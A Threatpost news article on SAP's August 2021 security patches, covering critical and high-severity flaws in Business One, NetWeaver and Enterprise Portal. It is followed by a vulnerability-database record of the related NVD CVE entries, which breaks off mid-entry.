SAP has released 19 new and updated [security patches](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=582222806>), three of them rated as “HotNews” critical and six as high-priority.
“HotNews” is the severity rating that SAP gives to critical vulnerabilities. Two of this month’s sizzlers have a CVSS score of 9.9 and affect SAP Business One and SAP NetWeaver Development Infrastructure.
SAP applications help organizations manage critical business processes – including enterprise resource planning (ERP), product lifecycle management, customer relationship management (CRM) and supply-chain management.
[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)
One of the 9.9ers is CVE-2021-33698, an unrestricted file-upload issue affecting SAP Business One, which is the German company’s business management software for small and medium-sized enterprises. The vulnerability allows an attacker to upload files, including malicious scripts, to the server.
According to Thomas Fritsch, an SAP security researcher at enterprise security firm Onapsis, the only reason it wasn’t given the top CVSS rating of 10 is because it needs a minimal set of authorizations.
In his patch Tuesday [writeup](<https://onapsis.com/blog/sap-security-patch-day-august-2021>), Fritsch said that fortunately for those customers who can’t immediately apply the related hotfix, there’s a workaround: “Simply deactivate the affected functionality,” he instructed. Of course, that’s just a quick fix. As always, SAP is stressing that the workaround be considered a temporary fix and not a permanent solution.
SAP described the second critical security bug, CVE-2021-33690, as a server-side request forgery (SSRF) affecting NetWeaver Development Infrastructure (SAP NWDI) in a servlet of the Component Build Service.
Onapsis said that the servlet was exposed to the outside world, “allowing attackers to perform proxy attacks by sending crafted queries.” According to Fritsch, SAP warned that the severity of the flaw depends on whether users are running NWDI on the intranet or internet. It’s bad news for those who are running it on the internet, SAP has emphasized, given that it “could completely compromise sensitive data residing on the server, and impact its availability,” the company reportedly said in its note.
As far as the third HotNews vulnerability goes – CVE-2021-33701 – the flaw is a SQL injection in the SAP NZDT (Near Zero Downtime Technology) service used by S/4HANA and the DMIS mobile plug-in. Its CVSS severity rating is 9.1.
“The tool is used by SAP’s corresponding NZDT service for time-optimized system upgrades and system conversions,” Fritsch explained. “When using the NZDT service, the maintenance is performed on a clone of the production system. All changes are recorded and transferred to the clone after the maintenance tasks are completed. During the final downtime, only a few activities are executed, including a switch of the production to the new system (clone).”
Again, there’s a workaround available for customers who’ve activated the Unified Connectivity (UCON) runtime check, he wrote: Don’t assign the used remote-enabled function module to any communication assembly in UCON.
## Four High-Severity Bugs
Onapsis gave a shout-out to Yvan Genuer, from the Onapsis Research Labs, who collaborated with SAP to fix four vulnerabilities in SAP Enterprise Portal.
One was CVE-2021-33702, a cross-site scripting (XSS) vulnerability in SAP NetWeaver Enterprise Portal that was caused by one of the portal’s servlets and given a rating of CVSS 8.3. It involves insufficient sanitization that allows for injection of JavaScript into the corresponding web page: an issue that could lead to a victim navigating to an infected servlet and triggering a vulnerable script to execute in their browser. The impact is high, but successful exploitation would be “highly complex” and would require user interaction, Fitsch explained, which are conditions that led to its lower CVSS score.
The quartet of high-severity patches includes a second XSS vulnerability, CVE-2021-33703, similarly found in another servlet of SAP NetWeaver Enterprise Portal and also rated CVSS 8.3.
The third high-priority fix is CVE-2021-33705. This one addresses a server-side request forgery (SSRF) vulnerability in one of the design-time components of SAP NetWeaver Enterprise Portal that would allow an unauthenticated attacker to craft a malicious URL that could send any type of request – POST or GET, for example – to any internal or external server were a user to click on it.
The fourth hole that Onapsis worked with SAP to seal up – CVE-2021-33707 – was tagged with a CVSS score of 6.1. It concerns a URL-redirection bug in SAP Knowledge Management that would allow remote attackers to “redirect users to arbitrary websites and conduct phishing attacks via a URL stored in a component,” Fitsch detailed: A scenario that would give attackers the ability “to compromise the user’s confidentiality and integrity.”
Other critical vulnerabilities covered on Tuesday were an authentication issue affecting SAP systems accessed through a Web Dispatcher, a task hijacking issue in the Fiori Client mobile app for Android and a missing authentication flaw in SAP Business One.
## Last Month = Calm, This Month = Storm
Given the nine critical patches, Fritsch dubbed [last month’s light SAP Patch Tuesday](<https://onapsis.com/blog/sap-security-patch-day-july-2021-serious-vulnerabilities-sap-netweaver-java-fixed>) the “calm before the storm.” In fact, he said, Tuesday’s raft of patches have earned August the dubious honor of being “the most noteworthy SAP Patch Day this year” for customers, he wrote.
“The small group of SAP applications that are affected by a CVSS 9.9 vulnerability in 2021 is now extended with SAP Business One and SAP NetWeaver Development Infrastructure,” Fritsch noted.
Word of caution to SAP Enterprise Portal customers in particular, he said, given the four patches released for the app, three of them rated high priority.
## Critical Flaws Weaponized in Less Than 72 hours
Enterprises will hopefully jump on the patches with utmost speed, given how fast SAP bugs are weaponized. An April threat intelligence [report](<https://www.onapsis.com/active-cyberattacks-business-critical-sap-applications>) from Onapsis and SAP found that critical SAP vulnerabilities are turned into exploits “in less than 72 hours of a patch release.” It’s even worse for new, unprotected SAP apps provisioned in cloud environments: They’re being discovered and compromised in less than three hours, according to the alert.
“Threat actors are active, capable and widespread,” the report advised, citing evidence of more than 300 automated exploitations leveraging seven SAP-specific attack vectors and 100+ hands-on-keyboard sessions from a wide range of threat actors. The companies found “clear evidence of sophisticated domain knowledge, including the implementation of SAP patches post-compromise.”
Adversaries were [carrying out a range of attacks](<https://threatpost.com/sap-bugs-cyberattack-compromise/165265/>), according to Onapsis and SAP, including theft of sensitive data, financial fraud, disruption of mission-critical business processes and other operational disruptions, and delivery of ransomware and other malware.
**Worried about where the next attack is coming from? We’ve got your back. [REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>) for our upcoming live webinar, How to Think Like a Threat Actor, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on [Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>).**
{"id": "THREATPOST:5A717CA5CEE8F6A187DFCCA59E90466A", "type": "threatpost", "bulletinFamily": "info", "title": "SAP Patches Nine Critical & High-Severity Bugs", "description": "SAP has released 19 new and updated [security patches](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=582222806>), three of them rated as \u201cHotNews\u201d critical and six as high-priority.\n\n\u201cHotNews\u201d is the severity rating that SAP gives to critical vulnerabilities. Two of this month\u2019s sizzlers have a CVSS score of 9.9 and affect SAP Business One and SAP NetWeaver Development Infrastructure.\n\nSAP applications help organizations manage critical business processes \u2013 including enterprise resource planning (ERP), product lifecycle management, customer relationship management (CRM) and supply-chain management.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nOne of the 9.9ers is CVE-2021-33698, an unrestricted file-upload issue affecting SAP Business One, which is the German company\u2019s business management software for small and medium-sized enterprises. The vulnerability allows an attacker to upload files, including malicious scripts, to the server.\n\nAccording to Thomas Fritsch, an SAP security researcher at enterprise security firm Onapsis, the only reason it wasn\u2019t given the top CVSS rating of 10 is because it needs a minimal set of authorizations.\n\nIn his patch Tuesday [writeup](<https://onapsis.com/blog/sap-security-patch-day-august-2021>), Fritsch said that fortunately for those customers who can\u2019t immediately apply the related hotfix, there\u2019s a workaround: \u201cSimply deactivate the affected functionality,\u201d he instructed. Of course, that\u2019s just a quick fix. As always, SAP is stressing that the workaround be considered a temporary fix and not a permanent solution.\n\nSAP described the second critical security bug, CVE-2021-33690, as a server-side request forgery (SSRF) affecting NetWeaver Development Infrastructure (SAP NWDI) in a servlet of the Component Build Service.\n\nOnapsis said that the servlet was exposed to the outside world, \u201callowing attackers to perform proxy attacks by sending crafted queries.\u201d According to Fritsch, SAP warned that the severity of the flaw depends on whether users are running NWDI on the intranet or internet. It\u2019s bad news for those who are running it on the internet, SAP has emphasized, given that it \u201ccould completely compromise sensitive data residing on the server, and impact its availability,\u201d the company reportedly said in its note.\n\nAs far as the third HotNews vulnerability goes \u2013 CVE-2021-33701 \u2013 the flaw is a SQL injection in the SAP NZDT (Near Zero Downtime Technology) service used by S/4HANA and the DMIS mobile plug-in. Its CVSS severity rating is 9.1.\n\n\u201cThe tool is used by SAP\u2019s corresponding NZDT service for time-optimized system upgrades and system conversions,\u201d Fritsch explained. \u201cWhen using the NZDT service, the maintenance is performed on a clone of the production system. All changes are recorded and transferred to the clone after the maintenance tasks are completed. During the final downtime, only a few activities are executed, including a switch of the production to the new system (clone).\u201d\n\nAgain, there\u2019s a workaround available for customers who\u2019ve activated the Unified Connectivity (UCON) runtime check, he wrote: Don\u2019t assign the used remote-enabled function module to any communication assembly in UCON.\n\n## Four High-Severity Bugs\n\nOnapsis gave a shout-out to Yvan Genuer, from the Onapsis Research Labs, who collaborated with SAP to fix four vulnerabilities in SAP Enterprise Portal.\n\nOne was CVE-2021-33702, a cross-site scripting (XSS) vulnerability in SAP NetWeaver Enterprise Portal that was caused by one of the portal\u2019s servlets and given a rating of CVSS 8.3. It involves insufficient sanitization that allows for injection of JavaScript into the corresponding web page: an issue that could lead to a victim navigating to an infected servlet and triggering a vulnerable script to execute in their browser. The impact is high, but successful exploitation would be \u201chighly complex\u201d and would require user interaction, Fitsch explained, which are conditions that led to its lower CVSS score.\n\nThe quartet of high-severity patches includes a second XSS vulnerability, CVE-2021-33703, similarly found in another servlet of SAP NetWeaver Enterprise Portal and also rated CVSS 8.3.\n\nThe third high-priority fix is CVE-2021-33705. This one addresses a server-side request forgery (SSRF) vulnerability in one of the design-time components of SAP NetWeaver Enterprise Portal that would allow an unauthenticated attacker to craft a malicious URL that could send any type of request \u2013 POST or GET, for example \u2013 to any internal or external server were a user to click on it.\n\nThe fourth hole that Onapsis worked with SAP to seal up \u2013 CVE-2021-33707 \u2013 was tagged with a CVSS score of 6.1. It concerns a URL-redirection bug in SAP Knowledge Management that would allow remote attackers to \u201credirect users to arbitrary websites and conduct phishing attacks via a URL stored in a component,\u201d Fitsch detailed: A scenario that would give attackers the ability \u201cto compromise the user\u2019s confidentiality and integrity.\u201d\n\nOther critical vulnerabilities covered on Tuesday were an authentication issue affecting SAP systems accessed through a Web Dispatcher, a task hijacking issue in the Fiori Client mobile app for Android and a missing authentication flaw in SAP Business One.\n\n## Last Month = Calm, This Month = Storm\n\nGiven the nine critical patches, Fritsch dubbed [last month\u2019s light SAP Patch Tuesday](<https://onapsis.com/blog/sap-security-patch-day-july-2021-serious-vulnerabilities-sap-netweaver-java-fixed>) the \u201ccalm before the storm.\u201d In fact, he said, Tuesday\u2019s raft of patches have earned August the dubious honor of being \u201cthe most noteworthy SAP Patch Day this year\u201d for customers, he wrote.\n\n\u201cThe small group of SAP applications that are affected by a CVSS 9.9 vulnerability in 2021 is now extended with SAP Business One and SAP NetWeaver Development Infrastructure,\u201d Fritsch noted.\n\nWord of caution to SAP Enterprise Portal customers in particular, he said, given the four patches released for the app, three of them rated high priority.\n\n## Critical Flaws Weaponized in Less Than 72 hours\n\nEnterprises will hopefully jump on the patches with utmost speed, given how fast SAP bugs are weaponized. An April threat intelligence [report](<https://www.onapsis.com/active-cyberattacks-business-critical-sap-applications>) from Onapsis and SAP found that critical SAP vulnerabilities are turned into exploits \u201cin less than 72 hours of a patch release.\u201d It\u2019s even worse for new, unprotected SAP apps provisioned in cloud environments: They\u2019re being discovered and compromised in less than three hours, according to the alert.\n\n\u201cThreat actors are active, capable and widespread,\u201d the report advised, citing evidence of more than 300 automated exploitations leveraging seven SAP-specific attack vectors and 100+ hands-on-keyboard sessions from a wide range of threat actors. The companies found \u201cclear evidence of sophisticated domain knowledge, including the implementation of SAP patches post-compromise.\u201d\n\nAdversaries were [carrying out a range of attacks](<https://threatpost.com/sap-bugs-cyberattack-compromise/165265/>), according to Onapsis and SAP, including theft of sensitive data, financial fraud, disruption of mission-critical business processes and other operational disruptions, and delivery of ransomware and other malware.\n\n**Worried about where the next attack is coming from? We\u2019ve got your back. [REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>) for our upcoming live webinar, How to Think Like a Threat Actor, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on [Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>).**\n", "published": "2021-08-11T15:27:02", "modified": "2021-08-11T15:27:02", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://threatpost.com/sap-patches-critical-bugs/168558/", "reporter": "Lisa Vaas", "references": ["https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=582222806", "https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/", "https://onapsis.com/blog/sap-security-patch-day-august-2021", "https://onapsis.com/blog/sap-security-patch-day-july-2021-serious-vulnerabilities-sap-netweaver-java-fixed", "https://www.onapsis.com/active-cyberattacks-business-critical-sap-applications", "https://threatpost.com/sap-bugs-cyberattack-compromise/165265/", "https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar", "https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar"], "cvelist": ["CVE-2021-33690", "CVE-2021-33698", "CVE-2021-33701", "CVE-2021-33702", "CVE-2021-33703", "CVE-2021-33705", "CVE-2021-33707"], "immutableFields": [], "lastseen": "2021-08-11T19:53:36", "viewCount": 196, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-33690", "CVE-2021-33698", "CVE-2021-33701", "CVE-2021-33702", "CVE-2021-33703", "CVE-2021-33705", "CVE-2021-33707"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165303", "PACKETSTORM:165304"]}, {"type": "zdt", "idList": ["1337DAY-ID-37147", "1337DAY-ID-37148"]}]}, "score": {"value": -0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-33702", "CVE-2021-33703", "CVE-2021-33707"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_810DF820366411E18FE300215C6A37BB.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165303", "PACKETSTORM:165304"]}, {"type": "talos", "idList": ["SAP"]}, {"type": "threatpost", "idList": ["THREATPOST:050A36E6453D4472A2734DA342E95366"]}, {"type": "zdt", "idList": ["1337DAY-ID-37147", "1337DAY-ID-37148"]}]}, "exploitation": null, "vulnersScore": -0.3}, "_state": {"dependencies": 1647589307, "score": 1659753002}}
{"cve": [{"lastseen": "2022-03-23T18:38:26", "description": "The SAP NetWeaver Portal, versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, component Iviews Editor contains a Server-Side Request Forgery (SSRF) vulnerability which allows an unauthenticated attacker to craft a malicious URL which when clicked by a user can make any type of request (e.g. POST, GET) to any internal or external server. This can result in the accessing or modification of data accessible from the Portal but will not affect its availability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2021-09-15T19:15:00", "type": "cve", "title": "CVE-2021-33705", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33705"], "modified": "2022-02-02T21:30:00", "cpe": ["cpe:/a:sap:netweaver_portal:7.31", "cpe:/a:sap:netweaver_portal:7.20", "cpe:/a:sap:netweaver_portal:7.30", "cpe:/a:sap:netweaver_portal:7.10", "cpe:/a:sap:netweaver_portal:7.40", "cpe:/a:sap:netweaver_portal:7.11", "cpe:/a:sap:netweaver_portal:7.50"], "id": "CVE-2021-33705", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33705", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:sap:netweaver_portal:7.11:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_portal:7.40:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_portal:7.10:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_portal:7.20:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_portal:7.50:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_portal:7.31:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_portal:7.30:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:38:18", "description": "Server-Side Request Forgery (SSRF) vulnerability has been detected in the SAP NetWeaver Development Infrastructure Component Build Service versions - 7.11, 7.20, 7.30, 7.31, 7.40, 7.50The SAP NetWeaver Development Infrastructure Component Build Service allows a threat actor who has access to the server to perform proxy attacks on server by sending crafted queries. Due to this, the threat actor could completely compromise sensitive data residing on the Server and impact its availability.Note: The impact of this vulnerability depends on whether SAP NetWeaver Development Infrastructure (NWDI) runs on the intranet or internet. The CVSS score reflects the impact considering the worst-case scenario that it runs on the internet.", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-09-15T19:15:00", "type": "cve", "title": "CVE-2021-33690", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33690"], "modified": "2021-09-28T15:04:00", "cpe": ["cpe:/a:sap:netweaver_development_infrastructure:7.31", "cpe:/a:sap:netweaver_development_infrastructure:7.40", "cpe:/a:sap:netweaver_development_infrastructure:7.30", "cpe:/a:sap:netweaver_development_infrastructure:7.11", "cpe:/a:sap:netweaver_development_infrastructure:7.50", "cpe:/a:sap:netweaver_development_infrastructure:7.20"], "id": "CVE-2021-33690", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33690", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sap:netweaver_development_infrastructure:7.40:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_development_infrastructure:7.50:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_development_infrastructure:7.11:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_development_infrastructure:7.31:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_development_infrastructure:7.30:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_development_infrastructure:7.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:38:24", "description": "Under certain conditions, NetWeaver Enterprise Portal, versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, does not sufficiently encode report data. An attacker can craft malicious data and print it to the report. In a successful attack, a victim opens the report, and the malicious script gets executed in the victim's browser, resulting in a Stored Cross-Site Scripting (XSS) vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-08-10T15:15:00", "type": "cve", "title": "CVE-2021-33702", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33702"], "modified": "2022-02-04T16:22:00", "cpe": ["cpe:/a:sap:netweaver_enterprise_portal:7.31", "cpe:/a:sap:netweaver_enterprise_portal:7.40", "cpe:/a:sap:netweaver_enterprise_portal:7.50", "cpe:/a:sap:netweaver_enterprise_portal:7.11", "cpe:/a:sap:netweaver_enterprise_portal:7.30", "cpe:/a:sap:netweaver_enterprise_portal:7.20", "cpe:/a:sap:netweaver_enterprise_portal:7.10"], "id": "CVE-2021-33702", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33702", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:sap:netweaver_enterprise_portal:7.10:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_enterprise_portal:7.11:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_enterprise_portal:7.30:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_enterprise_portal:7.40:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_enterprise_portal:7.31:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_enterprise_portal:7.50:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_enterprise_portal:7.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:38:22", "description": "SAP Business One, version - 10.0, allows an attacker with business authorization to upload any files (including script files) without the proper file format validation.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T19:15:00", "type": "cve", "title": "CVE-2021-33698", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33698"], "modified": "2021-09-28T14:12:00", "cpe": ["cpe:/a:sap:business_one:10.0"], "id": "CVE-2021-33698", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33698", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sap:business_one:10.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:38:25", "description": "Under certain conditions, NetWeaver Enterprise Portal, versions - 7.30, 7.31, 7.40, 7.50, does not sufficiently encode URL parameters. An attacker can craft a malicious link and send it to a victim. A successful attack results in Reflected Cross-Site Scripting (XSS) vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-08-10T15:15:00", "type": "cve", "title": "CVE-2021-33703", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33703"], "modified": "2022-02-04T16:24:00", "cpe": ["cpe:/a:sap:netweaver_enterprise_portal:7.30", "cpe:/a:sap:netweaver_enterprise_portal:7.50", "cpe:/a:sap:netweaver_enterprise_portal:7.31", "cpe:/a:sap:netweaver_enterprise_portal:7.40"], "id": "CVE-2021-33703", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33703", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:sap:netweaver_enterprise_portal:7.30:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_enterprise_portal:7.50:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_enterprise_portal:7.40:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_enterprise_portal:7.31:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:38:26", "description": "SAP NetWeaver Knowledge Management allows remote attackers to redirect users to arbitrary websites and conduct phishing attacks via a URL stored in a component. This could enable the attacker to compromise the user's confidentiality and integrity.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-08-10T15:15:00", "type": "cve", "title": "CVE-2021-33707", "cwe": ["CWE-601"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33707"], "modified": "2022-01-28T20:59:00", "cpe": ["cpe:/a:sap:netweaver_knowledge_management:7.40", "cpe:/a:sap:netweaver_knowledge_management:7.30", "cpe:/a:sap:netweaver_knowledge_management:7.50", "cpe:/a:sap:netweaver_knowledge_management:7.31"], "id": "CVE-2021-33707", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33707", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:sap:netweaver_knowledge_management:7.40:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_knowledge_management:7.31:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_knowledge_management:7.50:*:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver_knowledge_management:7.30:*:*:*:*:*:*:*"]}, {"lastseen": "2022-04-01T21:34:06", "description": "DMIS Mobile Plug-In or SAP S/4HANA, versions - DMIS 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710, 2011_1_730, 710, 2011_1_731, 710, 2011_1_752, 2020, SAPSCORE 125, S4CORE 102, 102, 103, 104, 105, allows an attacker with access to highly privileged account to execute manipulated query in NDZT tool to gain access to Superuser account, leading to SQL Injection vulnerability, that 